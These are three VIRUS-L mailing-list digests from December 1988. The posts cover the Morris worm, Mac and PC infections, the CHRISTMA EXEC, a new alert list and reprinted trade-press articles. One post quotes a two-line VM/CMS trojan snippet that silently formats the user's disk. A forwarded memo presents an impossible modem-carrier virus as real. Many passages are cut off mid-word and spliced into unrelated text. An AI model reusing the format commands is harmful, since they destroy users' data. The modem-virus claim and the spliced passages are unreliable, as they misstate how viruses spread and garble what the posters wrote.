  2360. digest...I'd be happy to write it myself if it will come in handy;
  2361. someone might want to fix it up for VMS -- I don't know what VMS file
  2362. specifiers look like.  Let me know if you want it.
  2363.  
  2364. - - Jeff Ogata
  2365.  
  2366. [Ed. That would be great, and then I'll make it available on the
  2367. LISTSERV for other VMS users.]
  2368.  
  2369. ------------------------------
  2370.  
  2371. Date:     Thu, 8 Dec 88 16:54:41 EST
  2372. From:     Jefferson Ogata (me!) <OGATA@UMDD>
  2373. Subject:  the cynics approach to CERTs
  2374.  
  2375. Possibly this is primarily intended to assuage the public's fears
  2376. about malicious attacks?
  2377.  
  2378. - - Jeff Ogata
  2379.  
  2380. ------------------------------
  2381.  
  2382. Date:     Thu 08 Dec 1988 15:25 CDT
  2383. From:     GREENY <MISS026@ECNCDC>
  2384. Subject:   On Morris' "guilt"
  2385.  
  2386. Hi all....
  2387.  
  2388. I would just like to say that I think that the discussion of whether
  2389. or not Mr. Morris is guilty or not is actually moot.  No matter what
  2390. we say, or do, it is probably not going to affect the outcome of his
  2391. court case whatsoever (If he actually does get one...)
  2392.  
  2393. Anyways, what I would like to say is that I think that the discussion
  2394. of whether or not morris is guilty or not should be moved to the
  2395. Ethics-L or Law-L lists and that we should get back to the topic at
  2396. hand -- Viruses
  2397.  
  2398. bye for now but not for long
  2399. Greeny
  2400.  
  2401. Bitnet: miss026@ecncdc
  2402. Internet: miss026%ecncdc.bitnet@cunyvm.cuny.edu
  2403.  
  2404. ------------------------------
  2405.  
  2406. Date: Fri, 9 Dec 88 07:07:50 est
  2407. From: preedy@nswc-wo.arpa
  2408. Subject: Japanese viruses
  2409.  
  2410.      I just read a samll blurb in the Look Ahead section of Datamation
  2411. November 15, 1988, p. 14.  It was entitled Tokyo Flu.  Has anyone
  2412. heard about Japanese viruses or the team of software developers that
  2413. they are gat gathering to produce an anit-viral package?  The article
  2414. also says that NEC was hit by a virus on its PC-VAN, and it is setting
  2415. up a similar project.
  2416.  
  2417.            Pat Reedy
  2418.  
  2419. ------------------------------
  2420.  
  2421. Date:     Fri, 09 Dec 88 02:39:29 -0900
  2422. From:     BILL _ POTTENGER <FTBP@ALASKA>
  2423. Subject:  nVir at University of Alaska (Mac)
  2424.  
  2425. The nVir was discovered here at UAF last week in our Student Council's
  2426. Mac lab.  Looks like a lot of people's data bit the dust.  UAF
  2427. computer support has good vaccines to stenger
  2428.  
  2429. ------------------------------
  2430.  
  2431. End of VIRUS-L Digest
  2432. *********************
  2433.  
  2434. VIRUS-L Digest              Friday, 9 Dec 1988          Volume 1 : Issue 41
  2435.  
  2436. Today's Topics:
  2437. Macintosh viruses
  2438. Re: Rajshree Bhatt - Macintosh viruses
  2439. Mac Virus Documentation from Apple
  2440. Re: Too much information
  2441. Spafford report in UK
  2442. CHRISTMA EXEC... (VM/CMS)
  2443. Dos 2 vs Dos 3, etc (PC)
  2444. enquiry for virus history
  2445.  
  2446. ---------------------------------------------------------------------------
  2447.  
  2448. Date: Fri, 9 Dec 88 08:43:50 EST
  2449. From: Rajshree_Bhatt%Wayne-MTS@um.cc.umich.edu
  2450. Subject: Macintosh viruses
  2451.  
  2452. I am also extremely interested in Mac viruses, and related material.
  2453. I don't wish to bore anyone by my ignorance but any comments would be
  2454. greatly appreciated. I've just been through a harrowing experience of
  2455. coming in each morning and finding that my system has been trashed!
  2456. The problem was not isolated, the dealer came in and gave me a
  2457. replacement.  So until someone enlightens me, Iiruses
  2458.  
  2459. >I am also extremely interested in Mac viruses, and related material...
  2460.  
  2461. You can obtain a HyperCard stack informing you about the known Mac
  2462. viruses, programs to get rid of them and keep them out, and general
  2463. hints on avoiding viruses by sending mail to LISTSERV at SCFVM on BITNet.
  2464. The text of the message should be GET ANTI-VIR SITHQX. Listserv will
  2465. send you a copy of the file. It is in BinHex4 format, and will have to
  2466. be decoded by BinHex4 or by StuffIt. If you're a novice Mac user, please
  2467. drop me a private note and I will help you with getting the file and
  2468. converting it back into a usable form.
  2469.  
  2470. - --- Joe M.
  2471.  
  2472. [Ed. Thanks again for the prompt answer, Joe!]
  2473.  
  2474. ------------------------------
  2475.  
  2476. Date:         Fri, 09 Dec 88 10:49:19 EST
  2477. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  2478. Subject:      Mac Virus Documentation from Apple
  2479.  
  2480. I just got a call yesterday from someone at Apple in California (I'm
  2481. sorry, but I didn't get his name) who tells me that Apple is pge. I don't know how long it will
  2482. be before it is out, but I would guess that they will let me know when
  2483. it is going to be.  I would suppose they'll provide it via AppleLink.
  2484.  
  2485. So, if you've had trouble getting my stack, you may be able to get it
  2486. from your Apple dealer soon!
  2487.  
  2488. - --- Joe M.
  2489.  
  2490. ------------------------------
  2491.  
  2492. Date:         Fri, 09 Dec 88 11:20:28 EST
  2493. From:         Ben Chi <BEC@ALBNYVM1.BITNET>
  2494. Subject:      Re: Too much information
  2495.  
  2496. ** OVERFLOW ** OVERFLOW ** OVERFLOW ** OVERFLOW ** OVERFLOW ** TILT **
  2497. I'm facing a dilemma that may be troubling other readers of this llist
  2498. as well:  the list contents is getting just too voluminous (not to say
  2499. repetitious at times) and I just don't have time to wade through it all
  2500. every day any more.  That by itself is of no interest to anyone else,
  2501. although it may be a problem some others are having as well.
  2502.  
  2503. Where the problem lies is that I'm relying on the list for early warning
  2504. of imminent trouble (a role it served ao unsubscribe for reasons of safety.
  2505.  
  2506. Which brings to mind an interesting question:  Is there another list that
  2507. serves as a virus alert hot-line?  If not, should there be one?  No
  2508. exchange of opinions, no flames, no meeting announcements, just facts
  2509. dealing with situations that require IMMEDIATE acton.
  2510.  
  2511. [Ed. I don't know of any such list, but it may not be a bad idea.]
  2512.  
  2513. _._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.
  2514. Benjamin E. Chi                                      BEC@ALBNYVM1.BITNET
  2515. Director of Technical and Network Services      or BEC@UACSC1.ALBANY.EDU
  2516. Computing Services Center                     fax available but unlisted
  2517. The University at Albany, Albany NY 12222 USA          vox (518)442-3702
  2518. Acknowledge-To: <BEC@ALBNYVM1>
  2519.  
  2520. ------------------------------
  2521.  
  2522. Date:     Fri, 9 Dec 88 14:47:54 GMT
  2523. From:     Ian O'Brien <I.O'Brien@GDR.BATH.AC.UK>
  2524. Subject:  Spafford report in UK
  2525.  
  2526.  
  2527. JANET based readers of this list might like to know thaf the
  2528. report is there. If you haven't used the info-server software before
  2529. send an empty mail message to "info-server@uk.ac.ukc" and find out how
  2530. to order a copy
  2531.  
  2532. Ian
  2533. - ---
  2534. Ian O'Brien - systems programmer at Bath University computing services
  2535.  
  2536. ------------------------------
  2537.  
  2538. Date:     Fri Dec 09 09:14:14 1988
  2539. From:     Pedro Sepulveda J. <PSEPULVE@USACHVM1>
  2540. Subject:  CHRISTMA EXEC... (VM/CMS)
  2541.  
  2542.     Hi Networkers...!
  2543.  
  2544.               We need  a copy of  CHRISTMA EXEC, any  people have
  2545.     it...?. Do you can send us it...?
  2546.  
  2547.               Thanks in advance...
  2548.  
  2549. Viral Research Group
  2550. Universidad de Santiago de Chile
  2551.  
  2552. ------------------------------
  2553.  
  2554. Date:     WED DEC 07, 1988 12.52.37 EST
  2555. From:     "Prof Arthur I. Larky" <AIL0@LEHIGH>
  2556. Subject:  Dos 2 vs Dos 3, etc (PC)
  2557.  
  2558. If you format a hard disk under dos3.x, and its big enough, it gets
  2559. formatted with 16-bit fat entries; dos2.x only formats with 12-bit fat
  2560. entries; thus, a hard drive formatted under dos3.x can'trable because there is no way to prevent a
  2561. program from doing anything.  Some things are not easy and/or possible
  2562. under DOS, but you can program anything.  Since everyone who cares to
  2563. read a manual can find out where all the important things are stored
  2564. in RAM, you can goof up anything.  Thus protection on PC's runs to
  2565. things like not letting you do disk writes and checking programs to see
  2566. if they have become longer or have had come check property (like CRC)
  2567. altered.  Not the greatest protection!
  2568.  
  2569. I don't think Fred Cohen has a bitnet address.  Last I heard he wanted
  2570. an account on Lehigh's computers, but wasn't given one because he isn't
  2571. on the faculty here any more.
  2572. Art Larky
  2573. CSEE Dept
  2574. Lehigh U
  2575. {Of course, these are my opinions and not Lehigh's.}
  2576.  
  2577. ------------------------------
  2578.  
  2579. Date:     9-DEC-1988 17:46:44 GMT
  2580. From:     Olivier Crepin-Leblond <ZDEE699@ELM.CC.KCL.AC.UK>
  2581. Subject:  enquiry for virus history
  2582.  
  2583. Does anybody know how I could get hold of a paper titled how he
  2584. actually imagined viruses.
  2585.  
  2586.  
  2587. Olivier Crepin-Leblond
  2588. Computer System & Electronics Engineering
  2589. King's College London
  2590. U.K.
  2591.  
  2592. ------------------------------
  2593.  
  2594. End of VIRUS-L Digest
  2595. *********************
  2596.  
  2597. VIRUS-L Digest              Monday, 12 Dec 1988         Volume 1 : Issue 42
  2598.  
  2599. Today's Topics:
  2600. Public CERT Teams
  2601. Paper viri and postage
  2602. Sending .arc files from vax/vms to ibm/vm userids
  2603. CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  2604. Virus Carried by >2400 baud modem carrier
  2605.  
  2606. ---------------------------------------------------------------------------
  2607.  
  2608. Date:         SAT, 10 DEC 88 13.11.11  EST
  2609. From:         "Scott J. Ellentuch" <KFBT@MARISTB>
  2610. Subject:      Public CERT Teams
  2611.  
  2612.      The idea of a CERT team is nothing new.  The Air Force (I
  2613. believe) has what they refer to as a "Tiger Team".  Basically they are
  2614. specialized in penetration testing.  They will set up a coordinated
  2615. effort to get into a computer system and then point out any weak
  2616. spots.  This service is also available to the public sector from only
  2617. a few companies.
  2618.      Using the techniques of computer "hackers/crackers" (Since some
  2619. team member ARE ex-hackers/crackers) they will attempt to launch a
  2620. full scale attack on your computer system.  When (and if) they gain
  2621. entry they will inform you as to where the weak spot was and
  2622. suggestions on how to improve security.  This service usually runs for
  2623. 1 week.
  2624.      Another service available is where they will log onto private
  2625. electronic bulletin boards and check to see if there is any
  2626. information about your system (Dial up #, passwords, etc) on those
  2627. boards.  Any such information is sent to the owner for further
  2628. actions.  This service usually lasts for one month.
  2629.      These people are also available to speak at conferences in the
  2630. fields of cowhen
  2631. relating to computer "hackers/crackers" and phone "phreaks"
  2632.      If anyone is interested in more information, please contact me
  2633. personally by email.......Scott J. Ellentuch   KFBT@MARISTB.BITNET
  2634.  
  2635. ------------------------------
  2636.  
  2637. Date:     Sat, 10 Dec 88 12:56:34 PST
  2638. From:     Robert Slade <USERCE57@UBCMTSG.BITNET>
  2639. Subject:  Paper viri and postage
  2640.  
  2641. Regarding the recent messages about a "personals" virus, and the
  2642. "caution" slowdown, a wirter in RISKS-FORUM suggested that a really
  2643. fiendish virus would be to send out a notification of a really serious
  2644. (and totally fictious) virus that was so dangerous you should reformat
  2645. *everything* you own, and send away for replacements of *all* your
  2646. software.  *But first* spread the message to everyone you know, so
  2647. they won't get caught ...
  2648.  
  2649. Also, I have had a number of requests from those in the States as to
  2650. how to get Canadian postage.  No, the Canadian post office doesn't
  2651. accept American postage.  (I have had people send cas in the States.)  As
  2652. the international community is aware, there are such things as
  2653. "International Reply Coupons" which allow you to, essentially,prepay
  2654. the return postage at your post office.
  2655.  
  2656. Unfortunately, I do not have access to Quad density disk drives at
  2657. home, so you must use 360 or 720 K.
  2658.  
  2659. And, I have not received a request in a year and a half for Apple or
  2660. Mac format.  I do not think, given how behind I am in just compiling
  2661. the stuff, that I can accomodate those requests.
  2662.  
  2663. Again, please don't ask for the stuff via email.
  2664.  
  2665. ------------------------------
  2666.  
  2667. Date:     Sun, 11 Dec 88 19:09 EST
  2668. From:     <MATHAIMT@VTCC1>
  2669. Subject:  Sending .arc files from vax/vms to ibm/vm userids
  2670.  
  2671. I am a recent subscriber to VIRUS-L and became one because I
  2672. discovered the Brain virus on some of my floppies. I've managed to get
  2673. a copy of FSP_14.arc from uxe.cso.uiuc.edu via anonymous ftp. I've
  2674. also downloaded it onto my PC and have De-Arced the contents and it
  2675. runs fine on my PCrd because I live off
  2676. campus and there are too many people on campus who are perpetually
  2677. logging into his boa rd. He has a VM account (on the IBM 3090) to
  2678. which I could send this file if I can determine how. This file is
  2679. currently on my VAX/VMS account. I've tried sending it with the
  2680. /binary and the /binary/netdata options of the send/file command but
  2681. when its downloaded it cannot be de-arced. I was wondering of some one
  2682. else encountered this problem and how it could be remedied.  I'm sorry
  2683. this doesn't pertain directly to viruses, but there are a lot of
  2684. students out there who would benefit greatly if I could make it
  2685. available on their BBS. Any help or leads would be greatly
  2686. appreciated.
  2687.  
  2688. - -Mathew Mathai
  2689. Student Virgina Tech (aka VPI & SU)
  2690. Blacksburg, VA.
  2691.  
  2692. ------------------------------
  2693.  
  2694. Date:         Sun, 11 Dec 88 22:39:38 EST
  2695. From:         Gabriel Basco <GJB100C@ODUVM>
  2696. Subject:      CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  2697.  
  2698. We got a REXX psuedo-compiler, tns besides the all the XMAS EXEC stuff..
  2699.  
  2700.    PUSH 'YES'
  2701.    'FORMAT 191 A'
  2702.  
  2703. Is there a way to fight back? Or should we just don;t run any programs
  2704. that appear in the READER??
  2705.  
  2706. Gabe
  2707.  
  2708. ------------------------------
  2709.  
  2710. Date: Tue, 6 Dec 88 08:33:44 PST
  2711. From: eto@elroy.jpl.nasa.go
  2712. Subject: Virus Carried by >2400 baud modem carrier
  2713.  
  2714. This memo has been distributed at JPL, but I have not run across
  2715. mention of the virus anywhere else:
  2716.  
  2717. Subject: New Virus
  2718. Sender:  David I NAKAMOTO / JPL/01                Contents: 2.
  2719.  
  2720. Part 1.
  2721.  
  2722.   TO: JEMS / JPL/01
  2723.  
  2724.   Part 2.
  2725.  
  2726.   There is a new virus out there that is carried on the subcarrier
  2727.   of modems running at 2400 baud or higher.  This virus was
  2728.   discovered by someone working in a Telecommunications company in
  2729.   Seattle.  From my information, this virus is transmitted during a
  2730.   binary file transfer and uses the subcarrier to change registers
  2731.   inside your modem to spread the virus around.  That's how it
  2732.   replicates.  The virapparent cure is to cycle the
  2733.   power on the modem or reset the modem registers BY HAND.  To
  2734.   prevent the spread of the virus, it is recommended that you use
  2735.   300 or 1200 baud only, that you refrain from file transfers, that
  2736.   sysops close their file transfer areas, and make backups of your
  2737.   hard disk every day in case of infection.
  2738.  
  2739.   Four systems are known to be infected with this virus, none on
  2740.   lab that I know of.  A possible hardware fix is being developed
  2741.   that filters the subcarrier for this virus.
  2742.  
  2743.   End of Item 2.
  2744.  
  2745. ------------------------------
  2746.  
  2747. End of VIRUS-L Digest
  2748. *********************
  2749.  
  2750. VIRUS-L Digest              Monday, 12 Dec 1988         Volume 1 : Issue 43
  2751.  
  2752. Today's Topics:
  2753. Too much information
  2754. administrative announcement - new list
  2755. Where can one get Fred Cohen's Thesis?
  2756. Virus and ethics articles from Gov. Computer News (long)
  2757. Help with a virus! (PC)
  2758.  
  2759. ---------------------------------------------------------------------------
  2760.  
  2761. Date:         Mon, 12 Dec 88 09:03:43 EST
  2762. From:         Joe Simpson <JS0al issue
  2763. discussions.
  2764.  
  2765. I would also like to thank Lehigh in general and the moderator in
  2766. particular, for sponsoring this list.  I am astounded at the amount of
  2767. effort cheerfully expended on this project.
  2768.  
  2769. [Ed. Thanks Joe.  See next message...]
  2770.  
  2771. ------------------------------
  2772.  
  2773. Date: Mon, 12 Dec 1988 10:53:52 EST
  2774. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  2775. Subject: administrative announcement - new list
  2776.  
  2777. In light of the recent (good) suggestions for expanding VIRUS-L, I've
  2778. implemented (thanks to Jim!) a new list, VALERT-L, which is to be used
  2779. strictly for virus announcements (e.g., "We just got hit by virus X -
  2780. what do we do???!?!?!").  Any discussion beyond the initial
  2781. announcement should be carried on either by private e-mail or on
  2782. VIRUS-L.  Messages sent to VALERT-L will automatically be cross-posted
  2783. in VIRUS-L digests whenever the next digest goes out.
  2784.  
  2785. Anyone sending non-announcement material to VALERT-L had better be
  2786. wearing asbestos skivvies - instant cinder.  In addition to the
  2787. resulting flames, these individuals will be removed from the list.
  2788. One of the reasons that I changed VIRUS-L to a digest format list was
  2789. to reduce the load on our IBM mainframe, LEHIIBM1.BITNET.  I don't
  2790. want VALERT-L becoming a problem.  Rather, it's just a vehicle for
  2791. urgent announcements to be used only when absolutely necessary.
  2792. With any degree of luck, VALERT-L will be extremely quiet.
  2793.  
  2794. Note that VALERT-L is being started on a *trial basis*.  If the
  2795. guidelines aren't adhered to, then it will have to be removed.  It
  2796. could be a very useful tool for getting warnings out to the network if
  2797. it is used properly; let's make the best of it.
  2798.  
  2799. Ok, now for the details:
  2800.  
  2801. 1) As stated above, all VALERT-L submissions will be cross-posted to
  2802. VIRUS-L.  VIRUS-L readers should decide whether they want to be
  2803. subscribed to both lists and plan accordingly.
  2804.  
  2805. 2) Subscribe to VALERT-L the same way you did to VIRUS-L; send mail to
  2806. LISTSERV@LEHIIBM1.BITNET saying SUB VALERT-L Your Name.  Please do not
  2807. send this mail to anything other than LISTSERV@LEHIIBM1!!
  2808.  
  2809. 3) Backlogs will be kept via VIRUS-L.  That is, since VALERT-L
  2810. messages will be cross posted to VIRUS-L (thus, logged there), there
  2811. will be no separate backlogs for VALERT-L.
  2812.  
  2813. 4) As with VIRUS-L, VALERT-L is open to anyone who adheres to its
  2814. guidelines.
  2815.  
  2816. I feel that this is the best compromise between a non-moderated group
  2817. for timely information and a moderated one for open discussion of the
  2818. issues.  Now it's up to the subscribers to make it worthwhile...  As
  2819. always, comments and suggestions are welcomed!
  2820.  
  2821. Ken
  2822.  
  2823. Kenneth R. van Wyk                   Calvin: Mom, I'm going to grow a LONG
  2824. User Services Senior Consultant         beard like the guys in ZZ Top!
  2825. Lehigh University Computing Center   Mom: That's great Calvin, do it!
  2826. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Wow, I thought she'd put up more
  2827. BITNET:   <LUKEN@LEHIIBM1>              of a fuss than that!
  2828.  
  2829. ------------------------------
  2830.  
  2831. Date:  Mon, 12 Dec 88 08:55 MST
  2832. From:  Lypowy@UNCAMULT.BITNET
  2833. Subject:  Where can one get Fred Cohen's Thesis?
  2834.  
  2835. Hello All,
  2836.    I know that you are tired of seeing messages like this, but frankly I
  2837. am at an end.  I am interested in obtaining a copy of Fred Cohen's
  2838. thesis.  Dorothy White at (I think) UAB left a message on this list
  2839. claiming that she got a copy of said document.  I then proceeded to send
  2840. her some mail, and nothing has been returned to me.  Thus I am appealing
  2841. to this list.  Does anyone have any details on how to obtain this
  2842. thesis?  If so, I would greatly appreciate it if you could send me some
  2843. mail with the details.
  2844.  
  2845.                     Thanks!
  2846.  
  2847.                               Greg Lypowy
  2848.                               Research Assistant
  2849.                               Department of Computer Science
  2850.                               University of Calgary
  2851.                               Calgary, Alberta, CANADA
  2852. UNCAMULT)
  2853.  
  2854. [Ed. In the past week (or so), I talked to a Professor from Univ. of
  2855. Cincinatti who told me that Fred Cohen had resigned from there
  2856. approximately 2 weeks before that.  I don't know where he is now,
  2857. however.]
  2858.  
  2859. ------------------------------
  2860.  
  2861. Date: 12 Dec 88 14:22:00 EDT
  2862. From: "AMSP6::CHRISTEVT" <christevt%amsp6.decnet@wpafb-ams1.arpa>
  2863. Subject: Virus and ethics articles from Gov. Computer News (long)
  2864.  
  2865.                    I N T E R O F F I C E   M E M O R A N D U M
  2866.  
  2867.                                         Date:      12-Dec-1988 14:22
  2868.                                         From:      Victor ET Christensen
  2869.                                                    CHRISTEVT
  2870.                                         Dept:
  2871.                                         Tel No:
  2872.  
  2873.       OK, folks, I got permission to send these out...I hope they're
  2874. not too out of date! These have been posted to VIRUS-L, ETHICS-L and
  2875. TCP-IP...
  2876.  
  2877.       For both:
  2878.  
  2879.               Government Computer News
  2880.               8601 Georgia Avenue, Suite 300
  2881.               Silver Spring, MD 20910
  2882.               (301) 650-2000
  2883.  
  2884.               November 21, 1988
  2885.               Volume 7  Number 24
  2886.               Copyright 1988 Ziff-Davis Publishing Company
  2887.  
  2888.  
  2889. Cover and page 100:
  2890.  
  2891.                      "BIG GUNS TAKE AIM AT VIRUS"
  2892.                        by Neil Munro, GCN Staff
  2893.  
  2894.       "In the aftermath of the most recent virus infection of the
  2895. Defense Data Network and Arpanet, Defense Department and National
  2896. Institute of Standards and Technology computer security officials are
  2897. scrambling to head off further attacks.
  2898.  
  2899.       "Officials of the facilities struck by the virus met this month
  2900. to discuss its nature and impact. The meeting at National Security
  2901. Agency headquarters in Fort Meade, Md., included representatives of
  2902. NSA and NIST as 'observers,' according to NIST computer security chief
  2903. Stuart Katzke.
  2904.  
  2905.       "Two days later, NSA and NIST officials met again to discuss how
  2906. to avert future infections, Katzke said. Katzke, who attended both
  2907. meetings, said no decisions had been reached on how to combat viruses,
  2908. and NSA and NIST representatives will meet again to firm up
  2909. recommendations.
  2910.  
  2911.       "Katzke, however, suggested one solution would be the formation
  2912. of a federal center for anti-virus efforts, operated jointly by NSA's
  2913. National Computer Security Center (NCSC) and NIST.
  2914.  
  2915.       "The center would inclinghouse that would collect and
  2916. disseminate information about threats, such as flaws in operating
  2917. systems, and solutions. However, funding and personnel for the center
  2918. is a problem, he said, because NIST does not have funds for such a
  2919. facility.
  2920.  
  2921.       "The center also would help organize responses to emergencies by
  2922. quickly warning users of new threats and defenses against them, he
  2923. said. People with solutions to a threat could transmit their answers
  2924. through the center to threatened users, he said. A database of experts
  2925. would be created to speed response to immediate threats.
  2926.  
  2927.       "The center would develop means of correcting flaws in software,
  2928. such as trapdoors in operating systems. Vendors would be asked to
  2929. develop and field solutions, he said.
  2930.  
  2931.       "NIST would work on unclassified systems and the NCSC would work
  2932. on secure military systems, he said. Information learned about viruses
  2933. from classified systems might be made available to the public through
  2934. the clearinks rapidly
  2935. became clogged, greatly slowing down communications. Across the
  2936. network, computer systems crashed as the virus continuously replicated
  2937. itself.
  2938.  
  2939.       "During a Pentagon press conference on the virus outbreak,
  2940. Raymond Colladay, director of the Defense Advanced Research Projects
  2941. Agency (DARPA), said the virus hit 'several dozen' installations out
  2942. of 300 on the agency's unclassified Arpanet network.
  2943.  
  2944. "Thousands Affected
  2945.  
  2946.       "The virus also was found in Milnet, which is the unclassified
  2947. portion of the Defense Data Network. Estimates of how many computers
  2948. on the network were struck varied from 6,000 to 250,000. The virus did
  2949. not affect any classified systems, DOD officials said.
  2950.  
  2951.       "The virus hit DARPA computers in Arlington, Va., and the
  2952. Lawrence Livermore Laboratories in California as well as many academic
  2953. institutions, Colladay said. It also affected the Naval Ocean Systems
  2954. Command in San Diego and the Naval Research Laboratory in Maryland, a
  2955. Navy somputers, the
  2956. virus was released Nov. 2 into Arpanet through a computer at the
  2957. Massachusetts Institute of Technology in Cambridge, Mass.
  2958.  
  2959.       "The Virus apparently was intended to demonstrate the threat to
  2960. networked systems. Published reports said the virus was developed and
  2961. introduced by a postgraduate student at Cornell University who
  2962. specializes in computer security. The FBI has interviewed the student.
  2963.  
  2964.       "Clifford Stoll, a computer security expert at Harvard
  2965. University who helped identify and neutralize the virus, said the
  2966. virus was about 40 kilobytes long and took 'several weeks' to write.
  2967. It replicated itself in three ways.
  2968.  
  2969. "Spreading the Virus
  2970.  
  2971.       "The first method exploited a little-known trapdoor in the
  2972. Sendmail electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The
  2973. trapdoor was created by a programmer who wanted to remove some bugs,
  2974. various reports said.  However, the programmer forgot to remove the
  2975. trapdoor in the final production versioe virus was an assembly language
  2976. program that found user names and then tried simple variations to
  2977. crack poorly conceived passwords and break into more computers, Stoll
  2978. said.
  2979.  
  2980.       "Yet another replication and transmission method used a widely
  2981. known bug in the Arpanet Finger program, which lets users know the
  2982. last time a distant user has signed onto a network. By sending a
  2983. lengthy Finger signal, the virus gained access to the operating
  2984. systems of Arpanet hosts.
  2985.  
  2986.       "The virus was revealed because its creator underestimated how
  2987. fast the virus would attempt to copy itself. Computers quickly became
  2988. clogged as the virus rapidly copied itself, although it succeeded only
  2989. once in every 10 copy attempts.
  2990.  
  2991.       "Users across the country developed patches to block the virus'
  2992. entrance as soon as copies were isolated and analyzed. Many users also
  2993. used Arpanet to disseminate the countermeasures, although transmission
  2994. was slowed by the numerous virus copies in the system.
  2995.  
  2996. . As soon as we
  2997. had put that fix in place, we could get back on,line.'
  2998.  
  2999.       "Colladay said DARPA will revise security policy on the network
  3000. and will decide whether more security features should be added. The
  3001. agency began a study of the virus threat two days after the virus was
  3002. released, he said.
  3003.  
  3004.       "All observers said the Arpanet virus helped raise awareness of
  3005. the general virus threat. Several experts said it would help promote
  3006. computer security efforts. 'Anytime you have an event like this it
  3007. heightens awareness and sensitivity,' Colladay said.
  3008.  
  3009.       "However, Katzke cautioned that viruses are less of a threat
  3010. than are access abusers and poor management practices such as
  3011. inadequate disaster protection or password control. Excellent
  3012. technical anti-virus defenses are of no use if management does not
  3013. maintain proper control of the system, he said.
  3014.  
  3015.       "Congress also is expected to respond to the virus outbreak. The
  3016. Computer Virus Eradication Act of 1988, wh
  3017. Whew!!! Now for the next one...
  3018.  
  3019.  
  3020. Page 85:
  3021.  
  3022.                "WHY SOFTWARE DEFECTS SO OFTEN GO UNDISCOVERED"
  3023.                         DP ISSUES by William E. Perry
  3024.  
  3025.       "Much has been written recently about defects in computer
  3026. software.  Defects are not new, but quantifying their frequency is
  3027. new. We are beginning to see the magnitude of the problem.
  3028.  
  3029.       "Some researchers say we are making between 40 and 80 defects
  3030. per 1,000 lines of source code. A line of source code normally is
  3031. defined as an executable line of code. A defect is a variation from
  3032. specifications, no matter how insignificant.
  3033.  
  3034.       "Most defects are caught before the system goes into production.
  3035. However, we are told that, on average, one to three defects per 1,000
  3036. lines of code get into production. The production defects can cause a
  3037. minor inconvenience, such as misspelling an executive's name, or wreak
  3038. havoc in an organization through the loss of large amounts of
  3039. resources.
  3040.  
  3041.       "There ares, which are uncovered by end users.
  3042.  
  3043.       "The question that needs to be asked in your organization is,
  3044. 'Who uncovers the defects?'
  3045.  
  3046.       "The answer may determine how credible your organization is in
  3047. the eyes of your end users. The more defects uncovered by the
  3048. information systems community, the greater the credibility of that
  3049. information processing function.
  3050.  
  3051. "Discouraging Efforts
  3052.  
  3053.       "But information systems personnel may be discouraged from
  3054. identifying defects, for several reasons:
  3055.  
  3056.       "- Finding a defect may mean more work for them, not only in
  3057. correcting it but also in tracking, monitoring and retesting the
  3058. corrections.
  3059.  
  3060.       "- Frequently, there is a finger-pointing to determine who is
  3061. responsible for the defect. The game is to pin the blame on another
  3062. person. An individual held responsible for a defect can lose
  3063. professional credibility and be ridiculed by his colleagues.
  3064.  
  3065.       "- Finally, defects can result in schedule delays or budget
  3066. overruysis can me
  3067. skipped, to meet schedule and budget limits.
  3068.  
  3069.       "There are also adverse consequences when defects are uncovered
  3070. outside the information systems group.
  3071.  
  3072.       "First is the high cost of correction. Barry Boehm of TRW Inc.
  3073. said the cost of correcting a defect in production can be as much as
  3074. 100 times the cost of correcting it during development.
  3075.  
  3076.       "Also, the information systems group may lose credibility. The
  3077. end users may look for alternative solutions, such as purchased
  3078. software or end-user-developed applications.
  3079.  
  3080.       "Some fundamental truths have a bearing on who uncovers defects
  3081. and the effect of those defects.
  3082.  
  3083.       "First, punishing those who detect defects in-house only
  3084. tranfers the job to external users and customers. If it is made
  3085. undesirable for the author to find defects in his own work, he won't
  3086. look for them. People naturally avoid punishment.
  3087.  
  3088. "Hiding the Blame
  3089.  
  3090.       "When individuals are held to blame for defects, they tend to
  3091. hide them.  For example, when an independent test group is checking
  3092. the work of a software author, and that test will pinpoint blame on
  3093. the author, the author will do whatever can be done to get the system
  3094. through the test so future blame will rest on the independent test
  3095. rather than the author.
  3096.  
  3097.       "When individuals are encouraged to hide defects, the cause of
  3098. those defects cannot be corrected and they will recur in future
  3099. systems. This is the major consequence of blaming people, rather than
  3100. processes, for defects.
  3101.  
  3102.       "The objective of the information systems organization should be
  3103. to detect 100 of the application defects internally.
  3104.  
  3105.       "All defects must be considered. These include not only defects
  3106. made because of MIS errors but also defects because of poor
  3107. requirement identification and poor design concepts. Whenever the
  3108. system fails to meet the true needs of the customer in a
  3109. cost-effective manner, it should be considered a defect.
  3110.  
  3111.       "Information systems managers must uncover defects internally.
  3112. This means not blaming one's employees for defects uncovered during
  3113. development. In fact, it may be necessary to reward internally
  3114. uncovered defects in order to reduce externally uncovered defects."
  3115.  
  3116.       William E. Perry is executive director, Quality Assurance
  3117. Institute, Orlando, Fla.
  3118.  
  3119.  
  3120.  
  3121.       That's it! I hope at least some, if not all, of you found it of
  3122. interest!
  3123.  
  3124.                                    ET B ME
  3125.                                      VIC
  3126.                                       !
  3127.  
  3128. ------------------------------
  3129.  
  3130. Date:        Mon, 12 Dec 88 17:06:37 AST
  3131. Subject:     Help with a virus! (PC)
  3132. From:        "Michael J. MacDonald" <MIKEMAC@UNB.BITNET>
  3133.  
  3134.    We discovered a virus (actually a worm) on Monday, 1988 Dec 05.
  3135.  
  3136.    We know the following:
  3137.       1) It works for IBM PC's and compatables.
  3138.  
  3139.       2) The worm resides on the boot block of a disk.
  3140.  
  3141.       3) The computer is infected when an infecteoks to see
  3142.          if it has an infected disk if it does not it picks up the
  3143.          "real" bootstrap drops in on a spot near the end of the disk,
  3144.          and installs itself in the bootstrap and then boots the machine.
  3145.  
  3146.       5) The place were it drops the "real" bootstrap is sector 709
  3147.          on a 360K floppy I doubt this is true for any other media.
  3148.  
  3149.       6) The WORM is counting. It doesn't seem to be counting anything
  3150.          obvious, number of copies of itself, number of machines...
  3151.  
  3152.       7) We can track the worm back to approx 88 Nov 24, to a public
  3153.          machine.
  3154.  
  3155.       8) By considence there were 3 FAT tables "magically" erased in the
  3156.          last 2 weeks that we know of. I was at a party on Saturday night
  3157.          and some of the comments that I was getting suggests that a
  3158.          fair number of organizations outside the university may have
